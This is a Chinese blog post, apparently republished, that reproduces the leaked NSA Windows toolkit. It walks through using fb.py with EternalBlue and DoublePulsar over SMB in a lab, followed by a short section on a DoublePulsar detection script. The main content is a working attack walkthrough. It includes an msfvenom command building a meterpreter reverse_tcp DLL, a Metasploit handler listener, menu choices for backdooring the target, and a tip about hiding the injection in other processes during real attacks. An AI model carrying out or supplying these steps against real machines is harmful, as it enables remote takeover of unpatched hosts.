ShadowBroker释放的NSA工具部分(windows)fb.py复现和中招检查方法(勒索病毒原理)
来源:互联网 发布:mac分屏功能怎么用 编辑:程序博客网 时间:2024/06/06 01:52
工具下载
1、Python2.6和pywin32安装包(注意都是32位的,不然会导致调用dll payload文件失败):
复现python和pywin32安装包 (分流下载:http://pan.baidu.com/s/1jHKw0AU 密码:kuij)
2、Shadowbroker放出的NSA攻击工具
https://github.com/misterch0c/shadowbroker
3、中招检查工具
中招检查工具 (分流下载:http://pan.baidu.com/s/1dETugox 密码:una3)
注:检查工具已重写了(各有所需,你可以根据自己需要修改)
一、 漏洞复现
1. 前期准备
攻击系统信息列表如下:
在攻击机器中安装好python 2.6.6和pywin32,并设置好python的环境变量,以便我们在cmd中使用。
然后生成用于反弹shell的dll payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.104 LPORT=8089 -f dll > reverser_tcp.dll
在靶机上开启SMB服务(默认开启),查看服务是否生效,即看靶机上的445端口是否在监听(netstat -ano):
2. 工具使用
在win 7攻击机器上cmd中切换到windows目录输入:python fb.py
创建攻击项目日志目录文件夹log_dirs并设置针对攻击目标192.168.0.103的攻击日志目录
然后输入:user eternalblue
一路回车直到需要选择对应的攻击系统,如下图:
选择1使用常规部署方式(也就是在靶机上建立后门的部署方式,带有模糊测试)
然后一路回车到确认攻击目标信息。
接着使用use doublepulsar,然后一直回车直到如下图需要选择攻击的服务类型:
备注:作者截图错误,图中的192.168.0.105应为192.168.0.103
我们攻击的服务类型是SMB,所以输入0,但是如果下次攻击的远程登陆,即RDP的时候输入1
然后选择攻击系统的版本:
这里我们输入与靶机对应的系统版本,输入1.
然后,需要选择想执行的动作:
这里我们输入2,执行由kali linux 2 msf生成的反弹shell的dll后门(放在C盘根目录):
回到win 7 攻击机器上设置好对应的反弹shell 的dll文件(payload)路径。
然后在Kali linux 2上运行msfconsole:
# msfconsole
msf > use exploit/multi/handler
msf > set LHOST 168.0.104
msf > set LPORT 8089
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > exploit
效果如下图:
上图说明了msf在监听本地端口(看是否有反弹的shell返回,并控制反弹的shell会话)。
在输入完用于反弹shell的路径后,需要输入反弹shell需要注入的进程和命令行进程,由于已经有默认设置,我们直接回车就好了(当然,在真实攻击中,最好是注入到其他进程中)
回车后发现已在攻击机器上成功执行并反弹了shell到Kali linux2机器上:
看到已成功利用了(即获取到winxp 靶机的cmd 会话权限):
成功控制靶机(能够以管理员权限控制住机器):
二、 中招检查方法
将中招检查工具转到想要检查的机器(需要python环境)上,通过cmd进入到工具所在目录:
运行python detect_doublepulsar_by_c4td0g.py 进行检查(默认检查本地(127.0.0.1):
看到上图的DOUBLEPULSAR DETECTED!!!说明已经中招!
本次shadowbroker放出的工具影响情况如下:
三、 总结
1、有人说写这个工具的人(NSA的人)编程水平不咋地?
2、有人说这是13年泄露的?
3、有人说不会用!?
思考时间:
1、很多东西实用就好,这是有针对性的;
2、源码里已说是12年开发的(或许更早);
3、坐等大牛写文章;
4、看了源码还有些目录不存在,说明还有戏看!
5、NSA在12年就写出了这样的工具,现在他们有的工具是什么样的?
- ShadowBroker释放的NSA工具部分(windows)fb.py复现和中招检查方法(勒索病毒原理)
- ShadowBroker释放的NSA工具部分(windows)fb.py复现和中招检查方法(勒索病毒原理)
- 预防NSA勒索病毒攻击脚本
- chak后缀成功解析成功.chak结尾的勒索病毒解密工具.arena后缀勒索病毒解密方法
- 勒索软件病毒的前世和防御方法
- 恢复勒索病毒“永恒之蓝”中招的文件,ooops,your files have been encrypted!解决方案
- 如何预防勒索病毒,没中招的朋友先预防吧
- 勒索病毒工作原理
- 应对最新的勒索病毒的方法
- 针对勒索病毒的数据库处理方法
- 你造吗?全新勒索病毒再次爆发!中招后无药可救
- 防范最新勒索病毒--坏兔子病毒(伪造Adobe Flash Player更新)的方法
- 为什么Wannacry 勒索病毒加密的部分数据能恢复?
- 勒索(比特币)病毒的预防
- Windows勒索病毒补丁下载
- linux 下的杀毒软件和病毒检查工具
- java各种后缀邮件勒索病毒文件解密工具解密方法---达康勒索病毒解密中心15169121444
- 第二波比特币勒索病毒的防范方法(一)
- 一文学会用 Tensorflow 搭建神经网络
- 可能每个人的路都不一样,说下我的路吧。
- hdu 3507 Print Article 斜率优化dp
- 关于操作矩阵中索引的技巧(二)
- RDIFramework.NET ━ .NET快速信息化系统开发框架 V3.2->新增“行政区域管理”,同时大批量树采用异步加载
- ShadowBroker释放的NSA工具部分(windows)fb.py复现和中招检查方法(勒索病毒原理)
- 信息系统项目管理师考试法律法规、行业标准、政策资料
- 比特币勒索软件病毒问题,关闭电脑端口
- 汇编语言复习练习题
- 欢迎使用CSDN-markdown编辑器
- 撤销表空间的切换+修改撤销记录保留的时间+查看参数的值+查询表空间信息
- 445端口简介及端口排除法关闭445端口
- MYSQL之HANDLER_READ_*详细讲解
- Java用循环数组实现队列